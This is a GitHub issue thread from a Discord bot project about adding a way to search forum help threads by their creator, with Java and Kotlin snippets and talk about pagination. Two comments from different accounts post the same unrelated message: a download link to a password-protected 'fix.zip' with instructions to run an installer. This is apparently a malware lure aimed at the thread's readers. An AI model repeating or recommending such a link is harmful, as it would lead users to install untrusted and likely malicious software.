### ISSUE TITLE
Implement searching threads by creator. 

### ISSUE THREAD

**Issue by ShreyasAyyengar** [learnspigot/discord-bot#256]
### Explain your idea.

Discord does not natively support searching forum channels for a post created by a specific user. The discord bot can facilitate doing so because the JDA provides this functionality:

```java
ForumChannel channel = {...} // get the #help channel.
String creatorId = {...} // requested discord user who created a help thread post.
List<ThreadChannel> foundThreads = new ArrayList<>();

for (ThreadChannel threadChannel : channel.getThreadChannels()) {
    if (threadChannel.getOwnerId().equalsIgnoreCase(creatorId)) {
        foundThreads.add(threadChannel);
    }
}
```

I realise the Discord bot is written in Kotlin, but I wanted to help anyone who wishes to PR this in finding the proper JDA methods.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by granpacho** [comment]
i mean whats the point

**Comment by granpacho** [comment]
anyways this is the code in kotlin 


``` kotlin
val helpChannel: ForumChannel = guild.getChannelById(1234)
val creatorID = userId
val threads: MutableList<ThreadChannel> = mutableListOf()

for (thread in helpChannel.threadChannels) {
	if (thread.ownerId.equals(creatorID)) {
		threads.add(thread)
	}
}
```

**Comment by ShreyasAyyengar** [comment]
> support searching forum channels for a post created by a specific user.

"support searching forum channels for a post created by a specific user."

**Comment by granpacho** [comment]
i mean i guess i could make a pr later I'm bored anyways

**Comment by granpacho** [comment]
so how should we make this work, like have three per page and have a button that changes pages or just the top 5 recent

**Comment by Tofpu** [comment]
> so how should we make this work, like have three per page and have a button that changes pages or just the top 5 recent

I personally think that having it three per page with a button to change pages would be a nicer addition. You're the one PRing it though, so up to you

**Comment by MLGPenguin** [comment]
> anyways this is the code in kotlin
> 
> ```kotlin
> val helpChannel: ForumChannel = guild.getChannelById(1234)
> val creatorID = userId
> val threads: MutableList<ThreadChannel> = mutableListOf()
> 
> for (thread in helpChannel.threadChannels) {
> 	if (thread.ownerId.equals(creatorID)) {
> 		threads.add(thread)
> 	}
> }
> ```

Here's the code in Kotlin but easier and uses our existing utils:
```kotlin
Server.helpChannel.threadChannels.filter { it.ownerId == userId }
```

I also think 5 per page, in line with the /reputation command would be nice and consistent.

**Comment by granpacho** [comment]
> Here's the code in Kotlin but easier and uses our existing utils:

Yeah I didn't look at any of the codebase I was just changing their code into kotlin, but that'll help actually I don't need to create a new postregistry method then
